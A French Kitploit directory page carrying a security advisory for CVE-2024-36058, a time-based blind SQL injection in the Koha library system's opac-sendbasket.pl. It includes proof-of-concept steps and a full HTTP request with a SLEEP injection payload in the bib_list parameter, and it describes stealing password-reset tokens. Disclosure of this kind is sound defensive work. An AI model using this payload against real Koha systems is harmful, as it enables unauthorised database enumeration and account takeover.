Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-36058 — Preuve de concept d'exploitation et avis de sécurité pour CVE-2024-36058, une injection SQL aveugle basée sur le temps dans opac-sendbasket.pl du logiciel de bibliothèque Koha, permettant l'énumération authentifiée de la base de données. | Kitploit
Outils/GitHubGitHub/hacklantic/cve-2024-36058
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubhacklantic/cve-2024-36058

CVE-2024-36058

Preuve de concept d'exploitation et avis de sécurité pour CVE-2024-36058, une injection SQL aveugle basée sur le temps dans opac-sendbasket.pl du logiciel de bibliothèque Koha, permettant l'énumération authentifiée de la base de données.

Voir le dépôt
il y a 10h 19mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-36058 — Koha Library Software < 22.05.22 — Injection SQL aveugle basée sur le temps

ID CVE : CVE-2024-36058
Produit : Koha Library Software
Type de vulnérabilité : Injection SQL aveugle basée sur le temps (CWE-89)
Score CVSS : 8,1 (Élevé) Authentifié
Versions concernées : Inférieures à 22.05.22
Crédits : Karolis Narvilas


Description

Koha est un système intégré de gestion de bibliothèque open source. Une vulnérabilité d'injection SQL aveugle basée sur le temps existe dans la fonctionnalité « Envoyer le panier » à l'adresse opac/opac-sendbasket.pl. Le paramètre bib_list est transmis sans assainissement dans une requête SQL, permettant à un attaquant d'injecter des charges utiles SQL arbitraires qui provoquent des délais mesurables dans la réponse du serveur.

Un utilisateur de bibliothèque ordinaire (faible privilège) peut exploiter cette vulnérabilité sans aucune permission élevée. En exploitant les écarts de temps de réponse, un attaquant peut énumérer la base de données et récupérer des contenus qui devraient être réservés à un accès privilégié.

Impact : Un attaquant distant authentifié peut exploiter CVE-2024-36058 pour énumérer des contenus sensibles de la base de données, notamment en exploitant le flux de réinitialisation de mot de passe et en récupérant les jetons de réinitialisation de mot de passe d'autres comptes utilisateur afin de les détourner, conduisant à un accès non autorisé et à une exposition potentielle des données.


Preuve de concept (PoC)

  1. Connectez-vous à Koha en tant qu'utilisateur de bibliothèque à faible privilège / ordinaire.
  2. Ajoutez un livre au panier, puis cliquez sur « Envoyer le panier ».

Envoyer le panier

  1. Interceptez la requête résultante à l'aide d'un proxy tel que Burp Suite et injectez la charge utile dans le paramètre bib_list comme indiqué ci-dessous :

Requête :

root@kitploit:~
POST /cgi-bin/koha/opac-sendbasket.pl HTTP/1.1
Host: {domain}
Cookie: [Session à faible privilège]
-- SNIP --

email_add=<recipient>&comment=x&bib_list=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(36)))x)--+-&csrf_token=<csrf_token>

  1. La charge utile injectée force la base de données à dormir avant de renvoyer une réponse. Dans cet exemple, le serveur a dormi pendant ~36 secondes, confirmant que le point d'injection est exploitable.

PoC de sommeil SQLi


Références

  • Communauté Koha - Notes de version pour v22.05.22
  • MITRE - CVE-2024-36058
  • Hacklantic
Télécharger l’outil